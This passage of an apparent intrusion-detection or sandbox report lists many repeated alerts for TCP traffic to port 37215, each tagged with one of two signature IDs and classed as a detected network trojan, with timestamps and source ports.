              Timestamp:06/13/24-21:32:13.567381
              SID:2829579
              Source Port:37390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440980
              SID:2835222
              Source Port:59360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.231246
              SID:2829579
              Source Port:35364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.264994
              SID:2835222
              Source Port:51050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.908717
              SID:2829579
              Source Port:53534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.300113
              SID:2835222
              Source Port:57878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.789903
              SID:2829579
              Source Port:44590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.871060
              SID:2829579
              Source Port:50916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.191880
              SID:2829579
              Source Port:54088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.453327
              SID:2829579
              Source Port:39046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.196394
              SID:2829579
              Source Port:33090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039213
              SID:2829579
              Source Port:55234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.308757
              SID:2829579
              Source Port:39506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177011
              SID:2835222
              Source Port:55444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.401355
              SID:2829579
              Source Port:56174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.636050
              SID:2835222
              Source Port:54342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.408428
              SID:2835222
              Source Port:56888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.630939
              SID:2835222
              Source Port:38780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.509242
              SID:2835222
              Source Port:34216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.696858
              SID:2829579
              Source Port:49788
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.165118
              SID:2835222
              Source Port:56756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.937863
              SID:2835222
              Source Port:47156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041681
              SID:2829579
              Source Port:56406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.158781
              SID:2829579
              Source Port:38742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.077335
              SID:2835222
              Source Port:32944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.013868
              SID:2835222
              Source Port:45810
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.129604
              SID:2835222
              Source Port:43880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.869977
              SID:2835222
              Source Port:35520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.094415
              SID:2835222
              Source Port:37772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.660199
              SID:2835222
              Source Port:39122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.306317
              SID:2829579
              Source Port:32848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458347
              SID:2829579
              Source Port:41702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.317192
              SID:2835222
              Source Port:43784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610276
              SID:2835222
              Source Port:45676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.094636
              SID:2835222
              Source Port:60340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.169892
              SID:2835222
              Source Port:60192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.241147
              SID:2835222
              Source Port:57854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.263640
              SID:2835222
              Source Port:36890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.055478
              SID:2829579
              Source Port:45724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.155026
              SID:2829579
              Source Port:46838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.238071
              SID:2835222
              Source Port:57598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.241102
              SID:2829579
              Source Port:48808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.670384
              SID:2835222
              Source Port:48662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.555987
              SID:2835222
              Source Port:49008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.170917
              SID:2829579
              Source Port:40528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.552860
              SID:2829579
              Source Port:33384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731013
              SID:2835222
              Source Port:45108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.045630
              SID:2829579
              Source Port:59152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.544161
              SID:2835222
              Source Port:56310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.996307
              SID:2829579
              Source Port:46942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.192573
              SID:2835222
              Source Port:51948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.301183
              SID:2829579
              Source Port:46548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028723
              SID:2829579
              Source Port:38354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.672148
              SID:2835222
              Source Port:48030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.123001
              SID:2835222
              Source Port:35982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.993055
              SID:2829579
              Source Port:46304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.991035
              SID:2829579
              Source Port:56846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.544440
              SID:2835222
              Source Port:38560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.679512
              SID:2829579
              Source Port:33660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.973376
              SID:2829579
              Source Port:59358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.301921
              SID:2835222
              Source Port:35934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.194041
              SID:2835222
              Source Port:35724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.308625
              SID:2829579
              Source Port:47584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.404518
              SID:2835222
              Source Port:52380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.055931
              SID:2835222
              Source Port:46270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.197735
              SID:2835222
              Source Port:54426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.420171
              SID:2835222
              Source Port:41002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.137957
              SID:2829579
              Source Port:45068
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.658905
              SID:2835222
              Source Port:58568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.089343
              SID:2829579
              Source Port:40446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.178736
              SID:2829579
              Source Port:44390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.298582
              SID:2829579
              Source Port:52388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.554925
              SID:2829579
              Source Port:41386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.670838
              SID:2835222
              Source Port:52916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.452730
              SID:2835222
              Source Port:60732
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.528092
              SID:2835222
              Source Port:35154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416270
              SID:2829579
              Source Port:40684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.315740
              SID:2835222
              Source Port:43436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.992367
              SID:2835222
              Source Port:47704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.246891
              SID:2829579
              Source Port:41154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.754295
              SID:2829579
              Source Port:49738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.655462
              SID:2835222
              Source Port:59664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.307637
              SID:2835222
              Source Port:42360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.244950
              SID:2835222
              Source Port:58864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.217060
              SID:2835222
              Source Port:33686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546429
              SID:2835222
              Source Port:35490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.101174
              SID:2829579
              Source Port:44456
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.308582
              SID:2829579
              Source Port:37074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730901
              SID:2835222
              Source Port:39690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.097753
              SID:2835222
              Source Port:48498
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.277506
              SID:2835222
              Source Port:40916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.934408
              SID:2835222
              Source Port:33186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.889556
              SID:2835222
              Source Port:41416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.988032
              SID:2829579
              Source Port:58372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.754241
              SID:2835222
              Source Port:39990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.419686
              SID:2829579
              Source Port:60594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.170531
              SID:2829579
              Source Port:39786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.822457
              SID:2829579
              Source Port:60074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.871918
              SID:2835222
              Source Port:60524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.552061
              SID:2835222
              Source Port:42358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.238528
              SID:2829579
              Source Port:38872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.779999
              SID:2829579
              Source Port:49210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.552896
              SID:2829579
              Source Port:53322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.273734
              SID:2829579
              Source Port:55644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.262891
              SID:2835222
              Source Port:52254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.302128
              SID:2829579
              Source Port:43676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.214119
              SID:2829579
              Source Port:36772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.671110
              SID:2835222
              Source Port:60326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.936468
              SID:2835222
              Source Port:37344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.657798
              SID:2829579
              Source Port:36246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174375
              SID:2829579
              Source Port:53702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.993663
              SID:2835222
              Source Port:43948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.805664
              SID:2829579
              Source Port:40250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.528436
              SID:2829579
              Source Port:36164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708504
              SID:2835222
              Source Port:55058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.133961
              SID:2829579
              Source Port:44494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.633738
              SID:2829579
              Source Port:34818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.094065
              SID:2835222
              Source Port:57056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.754397
              SID:2835222
              Source Port:44574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.423016
              SID:2829579
              Source Port:41162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.180721
              SID:2829579
              Source Port:54608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.308113
              SID:2835222
              Source Port:41932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.237890
              SID:2829579
              Source Port:40906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174543
              SID:2835222
              Source Port:60080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.246059
              SID:2835222
              Source Port:59730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.404007
              SID:2829579
              Source Port:58826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487423
              SID:2829579
              Source Port:36878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.043055
              SID:2835222
              Source Port:58380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.509095
              SID:2829579
              Source Port:45448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.302186
              SID:2835222
              Source Port:57884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.727929
              SID:2835222
              Source Port:38378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.346106
              SID:2829579
              Source Port:38542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.758975
              SID:2829579
              Source Port:45390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.156647
              SID:2829579
              Source Port:58298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.938448
              SID:2829579
              Source Port:60272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730222
              SID:2835222
              Source Port:44394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.751226
              SID:2835222
              Source Port:38068
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.994208
              SID:2835222
              Source Port:43618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824477
              SID:2835222
              Source Port:38192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176094
              SID:2835222
              Source Port:42234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.322047
              SID:2829579
              Source Port:36006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.454694
              SID:2829579
              Source Port:59498
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.822382
              SID:2829579
              Source Port:34392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.037964
              SID:2829579
              Source Port:58824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.243637
              SID:2829579
              Source Port:42284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.091741
              SID:2829579
              Source Port:40558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.173592
              SID:2829579
              Source Port:58056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.726968
              SID:2835222
              Source Port:56438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177608
              SID:2829579
              Source Port:55588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.040751
              SID:2835222
              Source Port:47714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.630121
              SID:2829579
              Source Port:37192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.631232
              SID:2829579
              Source Port:58866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.211030
              SID:2835222
              Source Port:60176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.359532
              SID:2829579
              Source Port:49686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.749872
              SID:2835222
              Source Port:46948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.485915
              SID:2835222
              Source Port:49332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.310005
              SID:2829579
              Source Port:47992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.098720
              SID:2829579
              Source Port:46924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.159177
              SID:2829579
              Source Port:51302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.223328
              SID:2829579
              Source Port:51890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.886714
              SID:2835222
              Source Port:49858
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.231598
              SID:2829579
              Source Port:51942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.259508
              SID:2829579
              Source Port:38964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.300909
              SID:2835222
              Source Port:40030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.306890
              SID:2835222
              Source Port:43380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.970410
              SID:2835222
              Source Port:52222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.660885
              SID:2835222
              Source Port:47276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.952479
              SID:2835222
              Source Port:45700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.568792
              SID:2835222
              Source Port:46590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.377143
              SID:2835222
              Source Port:44146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.155725
              SID:2829579
              Source Port:56816
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.320111
              SID:2829579
              Source Port:32930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.420082
              SID:2835222
              Source Port:34010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.214258
              SID:2835222
              Source Port:44104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.054967
              SID:2829579
              Source Port:37486
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694854
              SID:2829579
              Source Port:38372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.749550
              SID:2835222
              Source Port:36280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.318158
              SID:2829579
              Source Port:39306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.085844
              SID:2829579
              Source Port:35790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.086787
              SID:2835222
              Source Port:41376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.338057
              SID:2829579
              Source Port:56220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697324
              SID:2829579
              Source Port:41216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.454821
              SID:2829579
              Source Port:55680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.657997
              SID:2829579
              Source Port:51494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.308849
              SID:2835222
              Source Port:42222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.372549
              SID:2829579
              Source Port:58518
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695199
              SID:2835222
              Source Port:47760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.192271
              SID:2835222
              Source Port:49738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.229628
              SID:2835222
              Source Port:45992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.307077
              SID:2835222
              Source Port:36186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546746
              SID:2829579
              Source Port:59128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.607963
              SID:2829579
              Source Port:59618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.509005
              SID:2835222
              Source Port:42568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.726873
              SID:2835222
              Source Port:55658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.422150
              SID:2835222
              Source Port:41508
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.269172
              SID:2835222
              Source Port:37092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.409088
              SID:2835222
              Source Port:57186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.056832
